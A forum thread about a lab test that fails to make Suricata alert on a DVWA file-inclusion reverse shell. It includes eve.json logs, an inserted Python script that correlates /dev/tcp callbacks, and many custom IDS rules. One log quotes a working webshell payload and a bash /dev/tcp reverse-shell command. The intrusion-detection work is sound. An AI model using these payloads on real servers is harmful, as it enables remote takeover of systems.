Reverse Shell detection

Hi,

I am trying to detect a reverse shell with Suricata, but I do not get any alerts about it.
I am using DVWA (Damn Vulnerable Web Application) in my test environment and trying to test LFI with a reverse shell. When I get the shell from the web app server to my attacker machine, nothing is reported.
I have DVWA configured both on HTTP and HTTPS, but for the sake of testing I am using only HTTP now.
In the Suricata logs, Suricata assumes that it is legitimate TLS traffic, because I have set up my netcat listener on port 443. Log below:

{"timestamp":"2021-08-19T14:58:18.620513+0200","flow_id":2172483938159079,"in_iface":"ens33","event_type":"tls","src_ip":"192.168.184.132","src_port":58670,"dest_ip":"192.168.184.130","dest_port":443,"proto":"TCP","tls":{"sni":"ubuntu.tests.com","version":"TLS 1.3","ja3":{"hash":"a9ad47149f0ae19f6bbc8d0bf173e976","string":"771,4865-4866-49196-49195-49200-157-49198-49202-159-163-49199-156-49197-49201-158-162-49188-49192-61-49190-49194-107-106-49162-49172-53-49157-49167-57-56-49187-49191-60-49189-49193-103-64-49161-49171-47-49156-49166-51-50-49160-49170-10-49155-49165-22-19-255,0-5-10-11-13-50-17-23-43-45-51,29-23-24-25-30-256-257-258-259-260,0"},"ja3s":{"hash":"f4febc55ea12b31ae17cfb7e614afda8","string":"771,4865,43-51"}}}

Could anyone guide me how to detect such attacks?
This is my list of enabled rules:

19/8/2021 -- 15:12:28 - <Info> -- Loading distribution rule file /etc/suricata/rules/app-layer-events.rules
19/8/2021 -- 15:12:28 - <Info> -- Loading distribution rule file /etc/suricata/rules/decoder-events.rules
19/8/2021 -- 15:12:28 - <Info> -- Loading distribution rule file /etc/suricata/rules/dhcp-events.rules
19/8/2021 -- 15:12:29 - <Info> -- Loading distribution rule file /etc/suricata/rules/dnp3-events.rules
19/8/2021 -- 15:12:29 - <Info> -- Loading distribution rule file /etc/suricata/rules/dns-events.rules
19/8/2021 -- 15:12:29 - <Info> -- Loading distribution rule file /etc/suricata/rules/files.rules
19/8/2021 -- 15:12:29 - <Info> -- Loading distribution rule file /etc/suricata/rules/http-events.rules
19/8/2021 -- 15:12:29 - <Info> -- Loading distribution rule file /etc/suricata/rules/ipsec-events.rules
19/8/2021 -- 15:12:29 - <Info> -- Loading distribution rule file /etc/suricata/rules/kerberos-events.rules
19/8/2021 -- 15:12:29 - <Info> -- Loading distribution rule file /etc/suricata/rules/modbus-events.rules
19/8/2021 -- 15:12:29 - <Info> -- Loading distribution rule file /etc/suricata/rules/nfs-events.rules
19/8/2021 -- 15:12:29 - <Info> -- Loading distribution rule file /etc/suricata/rules/ntp-events.rules
19/8/2021 -- 15:12:29 - <Info> -- Loading distribution rule file /etc/suricata/rules/smb-events.rules
19/8/2021 -- 15:12:29 - <Info> -- Loading distribution rule file /etc/suricata/rules/smtp-events.rules
19/8/2021 -- 15:12:29 - <Info> -- Loading distribution rule file /etc/suricata/rules/stream-events.rules
19/8/2021 -- 15:12:29 - <Info> -- Loading distribution rule file /etc/suricata/rules/tls-events.rules
19/8/2021 -- 15:12:29 - <Info> -- Ignoring file rules/emerging-deleted.rules
19/8/2021 -- 15:12:33 - <Info> -- Loaded 30920 rules.

It seems that you are depending on the standard rules to detect that attack, and I am not sure if they contain a rule to detect that.

Moreover, since the connection is over TLS, the detection opportunities will lie in IOCs, TLS traffic signatures (if any), and behavior detection.

The bottom line is, you probably will have to write your own rule or adapt one from the standard set.

But the connection was not over TLS.
As I said, I just set up my netcat listener on port 443, but the traffic was unencrypted.
So it is more puzzling for me: why does Suricata think it is TLS?

Indeed, this should not happen. It might be good to try to reproduce the situation, capture a pcap and pass it to the dev team to investigate.

Ok, I will reproduce it. Where should I send a pcap?

I think posting it here will be fine.

Pcap file right here:

reverse_shell_tls.pcap (2.8 KB)

Hi @IDSTower
Any news? :slight_smile:

Hi, I replayed your pcap file in my test environment and 3 rules fired right away:
SID 2610004 "SURICATA non-TLS on TLS port" - this is expected: your shell is not TLS but runs on TLS port 443.
SID 3174423 "IDPS: base64 encoded PHP tags" - our custom rule, matched the PD9waHAg part in your exploit (base64 encoding of PHP tags). You can get it here.
SID 2019285 "ET WEB_SERVER Possible bash shell piped to dev tcp Inbound to WebServer" matched the "/dev/tcp/" part in your exploit.

None matched the reverse shell itself. It's possible to create a rule to match things like 'cannot set terminal process grou' or whatever is commonly used in shells, but those are trivial to bypass with obfuscation. It's better to focus on preventing shells from being popped in the first place :slight_smile:

Dear,
I inspected the provided pcap with Suricata 6.0.3 and no tls events were extracted. Below are the events I got from the pcap you provided:

{"timestamp":"2021-08-23T12:57:37.672195+0400","flow_id":1557968835400055,"event_type":"flow","src_ip":"192.168.184.130","src_port":38496,"dest_ip":"192.168.184.132","dest_port":443,"proto":"TCP","flow":{"pkts_toserver":10,"pkts_toclient":9,"bytes_toserver":981,"bytes_toclient":605,"start":"2021-08-23T12:57:37.872823+0400","end":"2021-08-23T12:57:43.821094+0400","age":6,"state":"established","reason":"shutdown","alerted":false},"tcp":{"tcp_flags":"1a","tcp_flags_ts":"1a","tcp_flags_tc":"1a","syn":true,"psh":true,"ack":true,"state":"established"}}
{"timestamp":"2021-08-23T12:57:37.672195+0400","flow_id":1328785085514179,"event_type":"http","src_ip":"192.168.184.132","src_port":42900,"dest_ip":"192.168.184.130","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"wojtek-testy.emca.pl","url":"/DVWA/vulnerabilities/fi/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=&cmd=bash+-c+"bash+-i+>%26+/dev/tcp/192.168.184.132/443+0>%261"","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0","http_method":"GET","protocol":"HTTP/1.1","length":0}}
{"timestamp":"2021-08-23T12:57:37.672195+0400","flow_id":1328785085514179,"event_type":"flow","src_ip":"192.168.184.132","src_port":42900,"dest_ip":"192.168.184.130","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":3,"pkts_toclient":2,"bytes_toserver":776,"bytes_toclient":140,"start":"2021-08-23T12:57:37.672195+0400","end":"2021-08-23T12:57:37.679583+0400","age":0,"state":"established","reason":"shutdown","alerted":false},"tcp":{"tcp_flags":"1a","tcp_flags_ts":"1a","tcp_flags_tc":"12","syn":true,"psh":true,"ack":true,"state":"established"}}
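
The correlation these eve.json records make possible, as an added example that is not from the thread, from Suricata or from IDSTower: it pairs an HTTP request whose URL carries a `/dev/tcp/<ip>/<port>` callback (the part SID 2019285 matched) with the web server's later outbound flow to exactly that ip:port, and reports whether Suricata recognised TLS on that flow (the "non-TLS on TLS port" case). The eve lines it runs on are constructed, modelled on the posted ones; the 120-second window and the port list are assumptions.

```python
"""Correlate Suricata eve.json records to flag a web-server-initiated callback.

Added example, not part of the thread or of Suricata. Input is eve.json as
newline-delimited JSON; the sample below is constructed and modelled on the
records posted in the thread (web server 192.168.184.130, client 192.168.184.132).
"""
import json
import re
from datetime import datetime, timedelta
from urllib.parse import unquote_plus

# bash's /dev/tcp/<ip>/<port> pseudo-device as it appears in the request URL
DEV_TCP_RE = re.compile(r"/dev/tcp/(\d{1,3}(?:\.\d{1,3}){3})/(\d{1,5})")
TLS_PORTS = {443}                 # ports where Suricata expects TLS (assumption)
WINDOW = timedelta(seconds=120)   # how long after the request a callback counts (assumption)


def parse_ts(ts: str) -> datetime:
    """Parse an eve.json timestamp such as 2021-08-23T12:57:37.672195+0400."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z")


def find_reverse_shells(records):
    """Return one finding per flow in which the HTTP server contacted a /dev/tcp target.

    A finding requires the *server* of the HTTP request (its dest_ip) to be the
    source of a later flow whose destination is exactly the ip:port named in the
    URL. app_proto on that flow shows whether Suricata saw TLS; a missing or
    non-tls app_proto on a TLS port is the "non-TLS on TLS port" situation.
    """
    callbacks = []   # requests seen so far that name a callback target
    findings = []
    for rec in records:
        et = rec.get("event_type")
        if et == "http":
            url = unquote_plus(rec.get("http", {}).get("url", ""))
            m = DEV_TCP_RE.search(url)
            if m:
                callbacks.append({
                    "ts": parse_ts(rec["timestamp"]),
                    "server": rec["dest_ip"],      # host that will execute the request
                    "client": rec["src_ip"],       # host that sent it
                    "cb_ip": m.group(1),
                    "cb_port": int(m.group(2)),
                    "url": url,
                })
        elif et == "flow":
            start = parse_ts(rec["flow"]["start"])
            for cb in callbacks:
                if (rec["src_ip"] == cb["server"]
                        and rec["dest_ip"] == cb["cb_ip"]
                        and rec["dest_port"] == cb["cb_port"]
                        and timedelta(0) <= start - cb["ts"] <= WINDOW):
                    app_proto = rec.get("app_proto")   # absent when no protocol was detected
                    findings.append({
                        "server": cb["server"],
                        "callback": f'{cb["cb_ip"]}:{cb["cb_port"]}',
                        "requested_by": cb["client"],
                        "app_proto": app_proto,
                        "nontls_on_tls_port": (cb["cb_port"] in TLS_PORTS
                                               and app_proto != "tls"),
                        "url": cb["url"],
                    })
    return findings


# Constructed eve.json lines. The first flow is an ordinary client->server TLS
# session on 443 (same direction as the tls event in the opening post) and must
# not be flagged; the last flow is the server calling back to the client on 443.
SAMPLE_EVE = """
{"timestamp":"2021-08-23T12:57:31.000000+0400","event_type":"flow","src_ip":"192.168.184.132","src_port":58670,"dest_ip":"192.168.184.130","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"start":"2021-08-23T12:57:30.000000+0400","end":"2021-08-23T12:57:31.000000+0400","state":"established"}}
{"timestamp":"2021-08-23T12:57:37.672195+0400","event_type":"http","src_ip":"192.168.184.132","src_port":42900,"dest_ip":"192.168.184.130","dest_port":80,"proto":"TCP","http":{"hostname":"dvwa.example.test","url":"/DVWA/vulnerabilities/fi/?page=...&cmd=bash+-c+%22bash+-i+>%26+/dev/tcp/192.168.184.132/443+0>%261%22","http_method":"GET"}}
{"timestamp":"2021-08-23T12:57:37.679583+0400","event_type":"flow","src_ip":"192.168.184.132","src_port":42900,"dest_ip":"192.168.184.130","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"start":"2021-08-23T12:57:37.672195+0400","end":"2021-08-23T12:57:37.679583+0400","state":"established"}}
{"timestamp":"2021-08-23T12:57:43.821094+0400","event_type":"flow","src_ip":"192.168.184.130","src_port":38496,"dest_ip":"192.168.184.132","dest_port":443,"proto":"TCP","flow":{"start":"2021-08-23T12:57:37.872823+0400","end":"2021-08-23T12:57:43.821094+0400","state":"established"}}
"""


def load_eve(text: str):
    """Parse newline-delimited eve.json text, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def scan_sample():
    """Run the correlation over the constructed sample."""
    return find_reverse_shells(load_eve(SAMPLE_EVE))


if __name__ == "__main__":
    for finding in scan_sample():
        print(json.dumps(finding, indent=2))
```

On a live sensor the same function can be fed `eve.json` line by line; the direction check is what keeps an ordinary TLS session to the web server on 443 from being reported.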

Hi @Mark,
Thank you for your reply.
Can you tell me where I can get the rule pattern for SID 2610004?
I do not have it in default rules provided with Suricata installation.

EDIT:

I tried to load idps.rules, but got a warning that Suricata failed to parse them:

root@ubuntu:/etc/suricata/rules# suricata-update --enable-conf idps.rules
26/8/2021 -- 12:26:31 - <Info> -- Using data-directory /var/lib/suricata.
26/8/2021 -- 12:26:31 - <Info> -- Using Suricata configuration /etc/suricata/suricata.yaml
26/8/2021 -- 12:26:31 - <Info> -- Using /etc/suricata/rules for Suricata provided rules.
26/8/2021 -- 12:26:31 - <Info> -- Found Suricata version 6.0.3 at /usr/bin/suricata.
26/8/2021 -- 12:26:31 - <Info> -- Loading idps.rules.
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "drop http $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"IDPS: WordPress login bruteforce - wp.getUsersBlogs in POST to /xmlrpc.php"; flow: established,to_server; content: "POST"; nocase; http_method; content: "/xmlrpc.php"; http_uri; nocase; fast_pattern; content: "wp.getUsersBlogs"; http_client_body; flowbits: set, IDPS_XMLRPC_BRUTE; sid:3000005; rev:1; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: Possible path traversal detected in URI"; flow: to_server,established; priority: 2; flowbits: isnotset, IDPS_SYSTRAV; content: "|2e 2e 2f 2e 2e 2f|"; http_uri; sid:3000006; rev:1; classtype: web-application-attack; metadata: created_at 2020_02_13, updated_at 2020_02_13, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET 80 (msg:"IDPS: Too many 404 replies detected"; flow: from_server,established; content: "404"; http_stat_code; detection_filter: track by_dst, count 5, seconds 60; sid:3000007; rev:1; classtype: web-application-attack; metadata: created_at 2020_02_13, updated_at 2020_02_13, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "drop http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: WordPress - wp-config.php requested."; flow: to_server,established; content: "GET"; http_method; nocase; content: "wp-config.php"; nocase; http_uri; sid:3000016; rev:1; classtype: web-application-attack; metadata: created_at 2020_02_13, updated_at 2020_02_13, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "drop http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: phpMyAdmin login request (GET)"; flow: established,to_server; content: "GET"; nocase; http_method; content: "pma_username"; http_uri; nocase; content: "pma_password"; http_uri; nocase; sid:3000020; rev:1; classtype: web-application-attack; metadata: created_at 2020_02_13, updated_at 2020_02_13, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "drop http $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"IDPS: PLAIN WordPress Login Bruteforcing Detected"; flow: to_server,established; content: "POST"; http_method; content: "/wp-login.php"; nocase; http_uri; content: "log|3d|"; http_client_body; content: "pwd|3d|"; http_client_body; detection_filter: track by_src,count 5,seconds 60; sid:3000021; rev:1; classtype: web-application-attack; metadata: created_at 2020_03_05, updated_at 2020_03_05, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "drop http $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"IDPS: PLAIN Joomla Login Bruteforcing Detected"; flow: to_server,established; content: "POST"; http_method; content: "/index.php"; nocase; http_uri; content: "username|3d|"; http_client_body; content: "password|3d|"; http_client_body; detection_filter: track by_src,count 5,seconds 60; sid:3000022; rev:1; classtype: web-application-attack; metadata: created_at 2020_03_05, updated_at 2020_03_05, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "drop http $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"IDPS: PLAIN Drupal Login Bruteforcing Detected"; flow: to_server,established; content: "POST"; http_method; content: "/user/login"; nocase; http_uri; content: "name|3d|"; http_client_body; content: "pass|3d|"; http_client_body; detection_filter: track by_src,count 5,seconds 60; sid:3000023; rev:1; classtype: web-application-attack; metadata: created_at 2020_03_05, updated_at 2020_03_05, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "drop http $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"IDPS: PLAIN Joomla Login Bruteforcing Detected (/administrator/)"; flow: to_server,established; content: "POST"; http_method; content: "/administrator/"; nocase; http_uri; content: "username|3d|"; http_client_body; content: "passwd|3d|"; http_client_body; detection_filter: track by_src,count 5,seconds 60; sid:3000024; rev:1; classtype: web-application-attack; metadata: created_at 2020_03_05, updated_at 2020_03_05, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "drop http $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"IDPS: WordPress pingback - pingback.ping in POST to /xmlrpc.php"; flow: established,to_server; content: "POST"; nocase; http_method; content: "/xmlrpc.php"; http_uri; nocase; fast_pattern; content: "pingback.ping"; http_client_body; flowbits: set, IDPS_XMLRPC_BRUTE; sid:3000026; rev:1; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: .gzip file requested"; flow: established,to_server; content: "GET"; nocase; http_method; content: ".gzip"; http_uri; nocase; sid:3000027; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: WordPress login attempt (noalert)"; flow: to_server,established; content: "POST"; http_method; content: "/wp-login.php"; nocase; http_uri; content: "log|3d|"; http_client_body; content: "pwd|3d|"; http_client_body; flowbits: isnotset, IDPS_WP_LOGIN; flowbits: set, IDPS_WP_LOGIN; flowbits: noalert; sid:3000028; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: WordPress login failed"; flow: from_server,established; flowbits: isset, IDPS_WP_LOGIN; content: !"302"; http_stat_code; flowbits: unset, IDPS_WP_LOGIN; sid:3000029; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: WordPress login success"; flow: from_server,established; flowbits: isset, IDPS_WP_LOGIN; content: "302"; http_stat_code; content: "Set-Cookie|3a| wordpress_logged_in"; flowbits: unset, IDPS_WP_LOGIN; sid:3000030; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: Joomla user login attempt (noalert)"; flow: to_server,established; content: "POST"; http_method; content: "/index.php"; nocase; http_uri; content: "option=com_users"; nocase; http_uri; content: "task=user.login"; nocase; http_uri; content: "username|3d|"; http_client_body; content: "password|3d|"; http_client_body; flowbits: isnotset, IDPS_JOOM_LOGIN; flowbits: set, IDPS_JOOM_LOGIN; flowbits: noalert; sid:3000031; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: Joomla login attempt /administrator/ (noalert)"; flow: to_server,established; content: "POST"; http_method; content: "/administrator/"; nocase; http_uri; content: "Cookie|3a|"; content: "username|3d|"; http_client_body; content: "passwd|3d|"; http_client_body; flowbits: isnotset, IDPS_JOOM_ADMIN_LOGIN; flowbits: set, IDPS_JOOM_ADMIN_LOGIN; flowbits: noalert; sid:3000032; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: Joomla user login failed"; flow: from_server,established; flowbits: isset, IDPS_JOOM_LOGIN; content: !"Set-Cookie|3a| joomla_user_state=logged_in"; flowbits: unset, IDPS_JOOM_LOGIN; sid:3000033; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: Joomla user login success"; flow: from_server,established; flowbits: isset, IDPS_JOOM_LOGIN; content: "303"; http_stat_code; content: "Set-Cookie|3a| joomla_user_state=logged_in"; flowbits: unset, IDPS_JOOM_LOGIN; sid:3000034; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: Drupal login attempt (noalert)"; flow: to_server,established; content: "POST"; http_method; content: "/user/login"; nocase; http_uri; content: "name|3d|"; http_client_body; content: "pass|3d|"; http_client_body; flowbits: isnotset, IDPS_DRUP_LOGIN; flowbits: set, IDPS_DRUP_LOGIN; flowbits: noalert; sid:3000035; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: Drupal login failed"; flow: from_server,established; flowbits: isset, IDPS_DRUP_LOGIN; content: !"303"; http_stat_code; flowbits: unset, IDPS_DRUP_LOGIN; sid:3000036; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: Drupal login success"; flow: from_server,established; flowbits: isset, IDPS_DRUP_LOGIN; content: "303"; http_stat_code; content: "Set-Cookie|3a| "; flowbits: unset, IDPS_DRUP_LOGIN; sid:3000037; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET 80 (msg:"IDPS: Too many 503 replies detected"; flow: from_server,established; content: "503"; http_stat_code; detection_filter: track by_dst, count 5, seconds 60; sid:3000057; rev:1; classtype: web-application-attack; metadata: created_at 2020_02_13, updated_at 2020_02_13, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: Joomla user login attempt /component/users/ (noalert)"; flow: to_server,established; content: "POST"; http_method; content: "/component/users/"; nocase; http_uri; content: "username|3d|"; http_client_body; content: "password|3d|"; http_client_body; flowbits: isnotset, IDPS_JOOM_LOGIN; flowbits: set, IDPS_JOOM_LOGIN; flowbits: noalert; sid:3000112; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: Joomla admin login failed"; flow: from_server,established; flowbits: isset, IDPS_JOOM_ADMIN_LOGIN; content: "0"; http_stat_code; offset: 1; depth: 1; content: !"Set-Cookie|3a|"; flowbits: unset, IDPS_JOOM_ADMIN_LOGIN; sid:3000138; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: Joomla admin login success"; flow: from_server,established; flowbits: isset, IDPS_JOOM_ADMIN_LOGIN; content: "303"; http_stat_code; content: "Set-Cookie|3a|"; flowbits: unset, IDPS_JOOM_ADMIN_LOGIN; sid:3000139; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: Joomla user login attempt (noalert)"; flow: to_server,established; content: "POST"; http_method; content: "/index.php"; nocase; http_uri; content: "option|3d|com_users"; nocase; http_client_body; content: "task|3d|user.login"; nocase; http_client_body; content: "username|3d|"; http_client_body; content: "password|3d|"; http_client_body; flowbits: isnotset, IDPS_JOOM_LOGIN; flowbits: set, IDPS_JOOM_LOGIN; flowbits: noalert; sid:3000140; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: Moodle login attempt (noalert)"; flow: to_server,established; content: "POST"; http_method; content: "/login/index.php"; nocase; http_uri; content: "username|3d|"; http_client_body; content: "password|3d|"; http_client_body; flowbits: isnotset, IDPS_MOODLE_LOGIN; flowbits: set, IDPS_MOODLE_LOGIN; flowbits: noalert; sid:3000141; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: Moodle login failed"; flow: from_server,established; flowbits: isset, IDPS_MOODLE_LOGIN; content: !"Set-Cookie|3a| MOODLEID1|5f||3d|deleted"; flowbits: unset, IDPS_MOODLE_LOGIN; sid:3000142; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: Moodle login success"; flow: from_server,established; flowbits: isset, IDPS_MOODLE_LOGIN; content: "303"; http_stat_code; content: "Set-Cookie|3a| MOODLEID1|5f||3d|deleted"; flowbits: unset, IDPS_MOODLE_LOGIN; sid:3000143; rev:1; classtype: web-application-attack; metadata: created_at 2020_04_20, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: HTTP client body contains passwd="; flow: to_server,established; priority: 2; flowbits: isnotset, IDPS_JOOM_ADMIN_LOGIN; content: "passwd="; nocase; http_client_body; sid:3000144; rev:1; classtype: web-application-attack; metadata: created_at 2020_06_26, updated_at 2020_06_26, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: HTTP client body contains password="; flow: to_server,established; priority: 2; flowbits: isnotset, IDPS_MOODLE_LOGIN; flowbits: isnotset, IDPS_JOOM_LOGIN; content: "password="; nocase; http_client_body; sid:3000145; rev:1; classtype: web-application-attack; metadata: created_at 2020_06_26, updated_at 2020_06_26, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: archive file hunter .gz"; flow: to_server,established; content: ".gz"; nocase; isdataat: !1, relative; http_uri; content: !"|2f|sitemap"; nocase; http_uri; content: !"|3d|sitemap"; nocase; http_uri; flowbits: isnotset, IDPS_ARCHIVE_HUNTER; flowbits: set, IDPS_ARCHIVE_HUNTER; flowbits: noalert; sid:3000146; rev:1; classtype: web-application-attack; metadata: created_at 2020_06_26, updated_at 2020_06_26, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: archive file hunter .rar"; flow: to_server,established; content: ".rar"; nocase; isdataat: !1, relative; http_uri; flowbits: isnotset, IDPS_ARCHIVE_HUNTER; flowbits: set, IDPS_ARCHIVE_HUNTER; flowbits: noalert; sid:3000147; rev:1; classtype: web-application-attack; metadata: created_at 2020_06_26, updated_at 2020_06_26, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: archive file hunter .zip"; flow: to_server,established; content: ".zip"; nocase; isdataat: !1, relative; http_uri; flowbits: isnotset, IDPS_ARCHIVE_HUNTER; flowbits: set, IDPS_ARCHIVE_HUNTER; flowbits: noalert; sid:3000148; rev:1; classtype: web-application-attack; metadata: created_at 2020_06_26, updated_at 2020_06_26, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: archive file hunter .7z"; flow: to_server,established; content: ".7z"; nocase; isdataat: !1, relative; http_uri; flowbits: isnotset, IDPS_ARCHIVE_HUNTER; flowbits: set, IDPS_ARCHIVE_HUNTER; flowbits: noalert; sid:3000149; rev:1; classtype: web-application-attack; metadata: created_at 2020_06_26, updated_at 2020_06_26, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: archive file hunter .sql"; flow: to_server,established; content: ".sql"; nocase; isdataat: !1, relative; http_uri; flowbits: isnotset, IDPS_ARCHIVE_HUNTER; flowbits: set, IDPS_ARCHIVE_HUNTER; flowbits: noalert; sid:3000150; rev:1; classtype: web-application-attack; metadata: created_at 2020_06_26, updated_at 2020_06_26, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: archive hunter file found"; flow: from_server,established; flowbits: isset, IDPS_ARCHIVE_HUNTER; content: "200"; http_stat_code; content: "Content-Type|3a| application"; flowbits: unset, IDPS_ARCHIVE_HUNTER; sid:3000151; rev:1; classtype: web-application-attack; metadata: created_at 2020_06_26, updated_at 2020_06_26, affected_product Web_Server_Applications; )"
